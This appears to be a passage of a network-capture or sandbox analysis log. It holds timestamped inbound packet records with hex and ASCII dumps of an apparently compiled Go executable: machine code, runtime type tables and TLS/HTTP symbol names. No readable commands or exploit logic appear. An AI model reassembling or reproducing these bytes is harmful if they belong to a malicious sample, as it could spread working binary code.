2022-11-07 22:48:54 UTC	2448	IN	Data Raw: 31 d2 eb 0f 48 8b 5c 24 20 48 83 c3 10 48 89 d9 48 89 c2 48 89 4c 24 20 48 89 54 24 18 48 8b 01 48 8b 59 08 48 8b 40 18 48 89 1c 24 90 ff d0 48 8b 44 24 18 48 ff c0 48 8b 4c 24 48 48 39 c1 7f c3 48 8b 6c 24 28 48 83 c4 30 c3 66 90 e8 1b 42 e0 ff e9 76 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 6f 48 83 ec 20 48 89 6c 24 18 48 8d 6c 24 18 48 8b 44 24 28 48 89 04 24 e8 ce 04 00 00 48 8b 44 24 08 48 8b 4c 24 10 0f 1f 40 00 48 85 c0 74 14 48 89 44 24 30 48 89 4c 24 38 48 8b 6c 24 18 48 83 c4 20 c3 48 8b 44 24 28 48 89 04 24 e8 f9 10 00 00 48 8b 44 24 08 48 8b 4c 24 10 48 89 44 24 30 48 89 4c 24 38 48 8b 6c 24 18 48 83 c4 20 c3 e8 76 41 e0 ff e9 71 ff ff ff cc cc cc Data Ascii: 1H\$ HHHHL$ HT$HHYH@H$HD$HHL$HH9Hl$(H0fBveH%(HH;avoH Hl$Hl$HD$(H$HD$HL$@HtHD$0HL$8Hl$H HD$(H$HD$HL$HD$0HL$8Hl$H vAq
2022-11-07 22:48:54 UTC	2464	IN	Data Raw: e8 28 5e da ff 48 8b 44 24 08 48 c7 00 02 00 00 00 48 8b 4c 24 58 48 d1 e1 48 89 48 08 48 8b 0d c1 bd 24 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 02 00 00 00 48 c7 44 24 18 02 00 00 00 e8 c9 b6 e1 ff 48 8b 44 24 20 48 8b 4c 24 30 48 8b 54 24 38 48 89 44 24 48 48 85 c0 0f 84 11 04 00 00 c7 44 24 60 08 00 00 00 48 8d 05 d5 06 09 00 48 89 44 24 78 48 8d 44 24 48 48 89 84 24 a8 00 00 00 48 8d 44 24 60 48 89 04 24 66 90 e8 9b e3 dc ff 85 c0 0f 85 c2 03 00 00 48 8d 05 4c 52 02 00 48 89 04 24 e8 83 5d da ff 48 8b 44 24 08 48 8b 4c 24 48 48 89 08 48 8b 0d 37 bd 24 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 01 00 00 00 48 c7 44 24 18 01 00 00 00 e8 2f b6 e1 ff 48 8b 44 24 20 48 8b 4c 24 30 48 8b 54 24 38 48 85 c0 0f 84 05 03 00 00 48 8b 4c 24 58 48 85 c9 0f Data Ascii: (^HD$HHL$XHHHH$H$HD$HD$HD$HD$ HL$0HT$8HD$HHD$`HHD$xHD$HH$HD$`H$fHLRH$]HD$HL$HHH7$H$HD$HD$HD$/HD$ HL$0HT$8HHL$XH
2022-11-07 22:48:54 UTC	2480	IN	Data Raw: 00 06 63 69 70 68 65 72 00 00 06 63 6c 69 65 6e 74 00 00 06 63 6c 6f 73 65 64 00 00 06 63 6f 6d 6d 6f 6e 00 00 06 63 6f 6e 63 61 74 00 00 06 63 6f 6e 64 66 6e 00 00 06 63 6f 6e 66 69 67 00 00 06 63 6f 6f 6b 69 65 00 00 06 63 75 72 45 6e 64 00 00 06 63 75 74 73 65 74 00 00 06 64 65 63 72 65 66 00 00 06 64 65 6c 65 74 65 00 00 06 64 69 61 6c 49 50 00 00 06 64 69 67 65 73 74 00 00 06 64 69 76 4d 75 6c 00 00 06 64 69 76 6d 6f 64 00 00 06 64 6f 43 61 6c 6c 00 00 06 64 6f 53 6c 6f 77 00 00 06 64 6f 6d 61 69 6e 00 00 06 64 79 6e 54 61 62 00 00 06 65 6e 63 6f 64 65 00 00 06 65 74 79 70 65 73 00 00 06 65 78 69 74 65 64 00 00 06 65 78 70 61 6e 64 00 00 06 65 78 74 65 6e 64 00 00 06 66 61 63 74 6f 72 00 00 06 66 61 6d 69 6c 79 00 00 06 66 69 65 6c 64 73 00 00 06 66 Data Ascii: cipherclientclosedcommonconcatcondfnconfigcookiecurEndcutsetdecrefdeletedialIPdigestdivMuldivmoddoCalldoSlowdomaindynTabencodeetypesexitedexpandextendfactorfamilyfieldsf
2022-11-07 22:48:54 UTC	2496	IN	Data Raw: 73 70 6c 69 74 00 00 0a 74 69 63 6b 65 74 4b 65 79 73 00 00 0a 74 69 6d 65 72 30 57 68 65 6e 00 00 0a 74 69 6d 65 72 73 4c 6f 63 6b 00 00 0a 74 69 6e 79 6f 66 66 73 65 74 00 00 0a 74 6f 74 61 6c 42 79 74 65 73 00 00 0a 74 72 61 63 65 53 77 65 65 70 00 00 0a 74 72 61 63 65 53 77 65 70 74 00 00 0a 74 72 61 63 65 6c 61 73 74 70 00 00 0a 74 72 61 66 66 69 63 4b 65 79 00 00 0a 74 72 61 6e 73 63 72 69 70 74 00 00 0a 74 72 79 43 68 75 6e 6b 4f 66 00 00 0a 74 72 79 44 65 6c 69 76 65 72 00 00 0a 74 72 79 47 65 74 46 61 73 74 00 00 0a 75 6e 6c 6f 63 6b 53 6c 6f 77 00 00 0a 75 6e 77 72 61 70 42 6f 64 79 00 00 0a 76 65 72 69 66 79 44 61 74 61 00 00 0a 76 69 63 74 69 6d 53 69 7a 65 00 00 0a 76 69 73 69 74 51 75 65 75 65 00 00 0a 76 6f 6c 41 6e 64 50 61 74 68 00 00 0a Data Ascii: splitticketKeystimer0WhentimersLocktinyoffsettotalBytestraceSweeptraceSwepttracelastptrafficKeytranscripttryChunkOftryDelivertryGetFastunlockSlowunwrapBodyverifyDatavictimSizevisitQueuevolAndPath
2022-11-07 22:48:54 UTC	2512	IN	Data Raw: 2a 69 6f 2e 57 72 69 74 65 43 6c 6f 73 65 72 00 00 0f 2a 69 6f 2e 6d 75 6c 74 69 52 65 61 64 65 72 00 00 0f 2a 69 6f 75 74 69 6c 2e 64 65 76 4e 75 6c 6c 00 00 0f 2a 6d 61 70 5b 69 6e 74 5d 73 74 72 69 6e 67 00 00 0f 2a 6d 61 70 5b 73 74 72 69 6e 67 5d 69 6e 74 01 00 0f 2a 6d 75 6c 74 69 70 61 72 74 2e 46 6f 72 6d 01 00 0f 2a 6e 65 74 2e 50 61 72 73 65 45 72 72 6f 72 00 00 0f 2a 6e 65 74 2e 64 69 61 6c 52 65 73 75 6c 74 00 00 0f 2a 6e 65 74 2e 77 72 69 74 65 72 4f 6e 6c 79 01 00 0f 2a 6e 65 74 74 72 61 63 65 2e 54 72 61 63 65 01 00 0f 2a 70 6b 69 78 2e 45 78 74 65 6e 73 69 6f 6e 00 00 0f 2a 70 6f 6c 6c 2e 6f 70 65 72 61 74 69 6f 6e 00 00 0f 2a 72 61 6e 64 2e 72 6e 67 52 65 61 64 65 72 00 00 0f 2a 72 61 6e 64 2e 72 6e 67 53 6f 75 72 63 65 01 00 0f 2a 72 65 Data Ascii: io.WriteCloserio.multiReaderioutil.devNullmap[int]stringmap[string]intmultipart.Formnet.ParseErrornet.dialResultnet.writerOnlynettrace.Tracepkix.Extensionpoll.operationrand.rngReaderrand.rngSource*re
2022-11-07 22:48:54 UTC	2528	IN	Data Raw: 75 6e 63 74 69 6f 6e 00 00 14 2a 72 75 6e 74 69 6d 65 2e 73 74 72 75 63 74 66 69 65 6c 64 00 00 14 2a 72 75 6e 74 69 6d 65 2e 74 72 61 63 65 42 75 66 50 74 72 01 00 14 2a 73 69 6e 67 6c 65 66 6c 69 67 68 74 2e 52 65 73 75 6c 74 01 00 14 2a 73 79 73 63 61 6c 6c 2e 43 65 72 74 43 6f 6e 74 65 78 74 01 00 14 2a 73 79 73 63 61 6c 6c 2e 52 61 77 53 6f 63 6b 61 64 64 72 01 00 14 2a 73 79 73 63 61 6c 6c 2e 53 74 61 72 74 75 70 49 6e 66 6f 01 00 14 2a 73 79 73 63 61 6c 6c 2e 53 79 73 50 72 6f 63 41 74 74 72 00 00 14 2a 74 65 78 74 70 72 6f 74 6f 2e 64 6f 74 52 65 61 64 65 72 01 00 14 2a 74 6c 73 2e 43 6c 69 65 6e 74 48 65 6c 6c 6f 49 6e 66 6f 01 00 14 2a 74 6c 73 2e 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 74 65 01 00 14 2a 74 6c 73 2e 53 69 67 6e 61 74 75 72 65 53 Data Ascii: unctionruntime.structfieldruntime.traceBufPtrsingleflight.Resultsyscall.CertContextsyscall.RawSockaddrsyscall.StartupInfosyscall.SysProcAttrtextproto.dotReadertls.ClientHelloInfotls.ConnectionState*tls.SignatureS
2022-11-07 22:48:54 UTC	2544	IN	Data Raw: 75 69 6e 74 38 29 20 63 69 70 68 65 72 2e 42 6c 6f 63 6b 4d 6f 64 65 00 00 1f 2a 66 75 6e 63 28 66 75 6e 63 28 75 69 6e 74 70 74 72 29 20 62 6f 6f 6c 29 20 65 72 72 6f 72 00 00 1f 2a 66 75 6e 63 28 69 6f 2e 52 65 61 64 65 72 29 20 28 69 6e 74 36 34 2c 20 65 72 72 6f 72 29 00 00 1f 2a 66 75 6e 63 28 69 6f 2e 52 65 61 64 65 72 2c 20 5b 5d 75 69 6e 74 38 29 20 65 72 72 6f 72 00 00 1f 2a 66 75 6e 63 28 69 6f 2e 57 72 69 74 65 72 29 20 28 69 6e 74 36 34 2c 20 65 72 72 6f 72 29 00 00 1f 2a 68 74 74 70 2e 68 74 74 70 32 68 65 61 64 65 72 46 69 65 6c 64 4e 61 6d 65 45 72 72 6f 72 00 00 1f 2a 68 74 74 70 2e 68 74 74 70 32 6e 6f 44 69 61 6c 43 6c 69 65 6e 74 43 6f 6e 6e 50 6f 6f 6c 00 00 1f 2a 68 74 74 70 2e 68 74 74 70 32 6e 6f 44 69 61 6c 48 32 52 6f 75 6e 64 54 Data Ascii: uint8) cipher.BlockModefunc(func(uintptr) bool) errorfunc(io.Reader) (int64, error)func(io.Reader, []uint8) errorfunc(io.Writer) (int64, error)http.http2headerFieldNameErrorhttp.http2noDialClientConnPool*http.http2noDialH2RoundT
2022-11-07 22:48:54 UTC	2560	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 f7 02 f2 cc 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 0b af 00 00 00 00 00 00 20 a5 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 46 5a ed e6 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 03 13 01 00 00 00 00 00 20 32 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 d2 6a df 8e 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 4f f3 00 00 00 00 00 00 60 cd 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 1e 09 26 b6 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 b4 fb 00 00 00 00 00 00 40 06 Data Ascii: 6otr jFZ6otr 2jj6otrO`k&6otr@
2022-11-07 22:48:54 UTC	2576	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 97 b2 c1 d0 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 1c a2 00 00 00 00 00 00 20 bf 68 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 32 9d 15 52 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 31 af 00 00 00 00 00 00 40 3a 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 ef 6b 52 f5 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 44 af 00 00 00 00 00 00 80 d6 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 30 d1 28 36 08 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 57 af 00 00 20 50 01 00 20 44 Data Ascii: 6otr h2R6otr1@:lkR6otrDj0(66otrW P D
2022-11-07 22:48:54 UTC	2592	IN	Data Raw: 88 02 08 08 17 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 86 9e 00 00 00 00 00 00 40 d0 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 72 13 d7 7b 02 08 08 17 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 b0 84 00 00 00 00 00 00 c0 5d 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 b9 6d b0 b3 02 08 08 17 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 38 e7 00 00 00 00 00 00 e0 d0 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 cf 54 b9 e2 02 08 08 17 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 2c 91 00 00 00 00 00 00 e0 e9 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 55 10 Data Ascii: tr@jr{tr]kmtr8jTtr,kU
2022-11-07 22:48:54 UTC	2608	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 70 01 00 00 00 00 00 00 e4 9b 05 d8 02 08 08 11 00 00 00 00 00 00 00 00 50 ff 72 00 00 00 00 00 1e 71 00 00 00 00 00 00 60 c6 6d 00 00 00 00 00 40 8b 68 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4d 04 b8 e3 0a 04 04 11 90 32 67 00 00 00 00 00 74 fd 72 00 00 00 00 00 a6 62 00 00 00 00 00 00 a0 c3 68 00 00 00 00 00 c0 9b 68 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 e7 45 39 0a 08 08 11 10 30 67 00 00 00 00 00 74 fd 72 00 00 00 00 00 b4 62 00 00 00 00 00 00 e0 c3 Data Ascii: pPrq`m@h@M2gtrbhhE90gtrb
2022-11-07 22:48:54 UTC	2624	IN	Data Raw: 00 00 00 00 00 a0 c3 68 00 00 00 00 00 40 9c 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 49 88 14 58 02 08 08 33 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 46 c8 00 00 00 00 00 00 01 00 01 00 00 00 00 00 20 c4 68 00 00 00 00 00 60 ef 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 35 d9 a5 13 02 08 08 33 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 bc d3 00 00 00 00 00 00 01 00 01 00 00 00 00 00 60 c4 68 00 00 00 00 00 60 a7 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 53 ce Data Ascii: h@hIX3trF h`i53tr`h`hS
2022-11-07 22:48:54 UTC	2640	IN	Data Raw: 00 00 00 00 00 50 83 00 00 01 00 01 00 10 00 00 00 00 00 00 00 7d 08 00 00 a0 89 02 00 00 27 0e 00 00 27 0e 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 ab 83 7a 12 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 b4 ba 00 00 00 00 00 00 60 31 69 00 00 00 00 00 60 50 00 00 01 00 01 00 10 00 00 00 00 00 00 00 f0 14 00 00 20 05 02 00 a0 06 14 00 a0 06 14 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 80 96 be 34 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 34 42 00 00 00 00 00 00 a0 31 6a 00 00 00 00 00 f0 70 00 00 01 00 01 00 10 00 00 00 00 00 00 00 7d 08 00 00 a0 89 02 00 e0 01 13 00 e0 01 13 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 55 aa Data Ascii: P}''z6otr`1i`P 46otr4B1jp}U
2022-11-07 22:48:54 UTC	2656	IN	Data Raw: bb 02 08 08 35 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 54 2e 01 00 00 00 00 00 60 c2 68 00 00 00 00 00 c0 74 68 00 00 00 00 00 20 95 6b 00 00 00 00 00 c8 96 6f 00 00 00 00 00 10 18 50 01 0c 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 bf 44 00 94 02 08 08 35 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 63 0e 01 00 00 00 00 00 60 c2 68 00 00 00 00 00 40 75 68 00 00 00 00 00 e0 95 6b 00 00 00 00 00 c8 96 6f 00 00 00 00 00 10 18 50 01 0c 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 9b 6b 64 ca 02 08 08 35 00 00 00 00 00 00 00 00 74 fd 72 00 00 00 00 00 2e 2e 01 00 00 00 00 00 60 c2 68 00 00 00 00 00 c0 75 68 00 00 00 00 00 a0 96 6b 00 00 00 00 00 c8 96 6f 00 00 00 00 00 10 18 Data Ascii: 5trT.`hth koPD5trc`h@uhkoPkd5tr..`huhko
2022-11-07 22:48:54 UTC	2672	IN	Data Raw: 00 00 00 00 00 c8 32 00 00 02 00 00 00 10 00 00 00 00 00 00 00 e0 ed 00 00 e0 01 02 00 e0 55 22 00 e0 55 22 00 3f 7d 00 00 80 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 d3 37 55 d6 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 b1 29 01 00 00 00 00 00 60 0d 6b 00 00 00 00 00 c8 32 00 00 02 00 02 00 10 00 00 00 00 00 00 00 f0 14 00 00 20 05 02 00 20 1e 24 00 20 1e 24 00 69 1f 00 00 e0 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 bb 0a 91 32 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 a0 f2 00 00 00 00 00 00 e0 60 Data Ascii: 2U"U"?}7U6otr)`k2 $ $i26otr`
2022-11-07 22:48:54 UTC	2688	IN	Data Raw: 00 00 00 00 00 20 00 00 00 00 00 00 00 f4 1e 00 00 c0 ef 01 00 45 1f 00 00 20 05 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 7b 00 81 0f 08 08 0b 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 68 f3 00 00 a0 6b 05 00 48 26 00 00 03 00 00 00 10 00 00 00 00 00 00 00 2b 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 0d c6 b9 3a 07 08 08 14 30 95 6f 00 00 00 00 00 75 fd 72 00 00 00 00 00 b0 be 00 00 60 b1 01 00 68 d6 66 00 00 00 00 00 a0 11 6a 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 68 26 Data Ascii: E P{otrhkH&+:0our`hfjh&
2022-11-07 22:48:54 UTC	2704	IN	Data Raw: 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 e4 4f c8 b5 02 08 08 19 00 00 00 00 00 00 00 00 75 fd 72 00 00 00 00 00 3b 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 50 6a 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 13 b0 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 2b b0 66 00 00 00 00 00 a0 1e 6a 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 cc 56 88 bc 02 08 08 19 00 00 00 00 00 00 00 00 75 fd 72 00 00 00 00 00 e7 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 70 51 6a 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 13 b0 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 2b b0 66 00 00 00 00 00 20 71 Data Ascii: Our;<Pjf`h+fjVurEpQjf`h+f q
2022-11-07 22:48:54 UTC	2720	IN	Data Raw: 55 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 be a2 00 00 00 00 00 00 60 e7 6a 00 00 00 00 00 f4 06 00 00 04 00 03 00 10 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 00 66 07 00 00 66 07 00 6c 07 00 00 c0 ef 01 00 60 67 07 00 60 67 07 00 3a 09 00 00 c0 ef 01 00 00 00 00 00 00 00 00 00 30 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 bd 60 e4 73 09 08 08 36 88 95 6f 00 00 00 00 00 74 fd 72 00 00 00 00 00 c1 95 00 00 00 00 00 00 20 7a 6a 00 00 00 00 00 78 26 00 00 04 00 04 00 10 00 00 00 00 00 00 00 f0 14 00 00 20 05 02 00 c0 1f 09 00 c0 1f 09 00 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 46 00 00 a0 00 02 00 40 20 Data Ascii: U6otr`jffl`g`g:0`s6otr zjx& F@
2022-11-07 22:48:54 UTC	2736	IN	Data Raw: 00 00 00 00 00 40 00 00 00 00 00 00 00 11 b2 66 00 00 00 00 00 a0 c3 68 00 00 00 00 00 00 00 00 00 00 00 00 00 87 b0 66 00 00 00 00 00 a0 4b 68 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 79 da 3d e2 07 08 08 19 00 00 00 00 00 00 00 00 90 fd 72 00 00 00 00 00 1c d5 00 00 60 53 04 00 00 00 00 00 00 00 00 00 40 d1 6a 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ce b7 66 00 00 00 00 00 e0 e9 6b 00 00 00 00 00 01 00 00 00 00 00 00 00 29 b8 66 00 00 00 00 00 c0 9b 68 00 00 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 fb 59 Data Ascii: @fhfKh@0y=r`S@j@fk)fhP`PY
2022-11-07 22:48:54 UTC	2752	IN	Data Raw: db 02 08 08 19 00 00 00 00 00 00 00 00 79 fd 72 00 00 00 00 00 c6 17 02 00 00 00 00 00 b0 00 67 00 00 00 00 00 d0 10 6b 00 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 a9 b0 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 6f b0 66 00 00 00 00 00 e0 c0 69 00 00 00 00 00 10 00 00 00 00 00 00 00 98 72 67 00 00 00 00 00 e0 07 68 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 80 dd 15 02 02 08 08 19 00 00 00 00 00 00 00 00 75 fd 72 00 00 00 00 00 df 39 01 00 00 00 00 00 b0 00 67 00 00 00 00 00 70 11 6b 00 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 a9 b0 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 8b b0 66 00 00 00 00 00 40 9c Data Ascii: yrgkf`hofirgh (ur9gpkf`hf@
2022-11-07 22:48:54 UTC	2768	IN	Data Raw: 00 00 00 00 00 58 00 00 00 00 00 00 00 3b b0 66 00 00 00 00 00 40 9a 69 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b5 66 00 00 00 00 00 60 c2 68 00 00 00 00 00 00 00 00 00 00 00 00 00 0e e2 66 00 00 00 00 00 60 a7 68 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 66 d8 73 0e 07 08 08 19 00 00 00 00 00 00 00 00 78 fd 72 00 00 00 00 00 23 f2 00 00 60 92 01 00 c8 e2 66 00 00 00 00 00 60 51 6b 00 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 c8 32 00 00 00 00 00 00 58 00 00 00 00 00 00 00 3b b0 66 00 00 00 00 00 40 9a 69 00 00 00 00 00 00 00 00 00 00 00 00 00 06 b6 66 00 00 00 00 00 20 b6 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 04 b5 Data Ascii: X;f@i\|f`hf`h fsxr#`f`Qk2X;f@if k
2022-11-07 22:48:54 UTC	2784	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 00 00 00 00 00 70 00 00 00 00 00 00 00 6f b8 2f 51 02 08 08 19 00 00 00 00 00 00 00 00 2a fe 72 00 00 00 00 00 8e 3e 01 00 e0 80 01 00 00 b0 66 00 00 00 00 00 f0 90 6b 00 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 36 e2 66 00 00 00 00 00 20 fc 68 00 00 00 00 00 00 00 00 00 00 00 00 00 86 bb 66 00 00 00 00 00 c0 28 69 00 00 00 00 00 10 00 00 00 00 00 00 00 c8 c7 66 00 00 00 00 00 60 19 69 00 00 00 00 00 50 00 00 00 00 00 00 00 70 ed 66 00 00 00 00 00 e0 30 68 00 00 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 00 00 00 00 d0 00 00 00 00 00 00 00 b9 af b3 6c 02 08 08 19 00 00 00 00 00 00 00 00 fc fe 72 00 00 00 00 00 4a 2d 01 00 20 81 01 00 00 b0 Data Ascii: ppo/Q*r>fk6f hf(if`iPpf0hlrJ-
2022-11-07 22:48:54 UTC	2800	IN	Data Raw: 00 00 00 00 00 c0 d0 6b 00 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 b0 50 00 00 00 00 00 00 70 00 00 00 00 00 00 00 fa b5 66 00 00 00 00 00 40 9c 68 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9d 67 00 00 00 00 00 60 a7 68 00 00 00 00 00 30 00 00 00 00 00 00 00 3b 80 67 00 00 00 00 00 e0 32 69 00 00 00 00 00 34 00 00 00 00 00 00 00 a0 fe 66 00 00 00 00 00 40 9c 68 00 00 00 00 00 40 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 a2 e4 e6 f7 07 08 08 19 00 00 00 00 00 00 00 00 77 fd 72 00 00 00 00 00 c8 ea 00 00 60 02 05 00 b0 00 67 00 00 00 00 00 80 d1 6b 00 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 b0 50 00 00 00 00 00 00 70 00 00 00 00 00 00 00 94 b1 66 00 00 00 00 00 60 c3 68 00 00 00 00 00 00 00 Data Ascii: kPpf@hg`h0;g2i4f@h@ wr`gkPpf`h
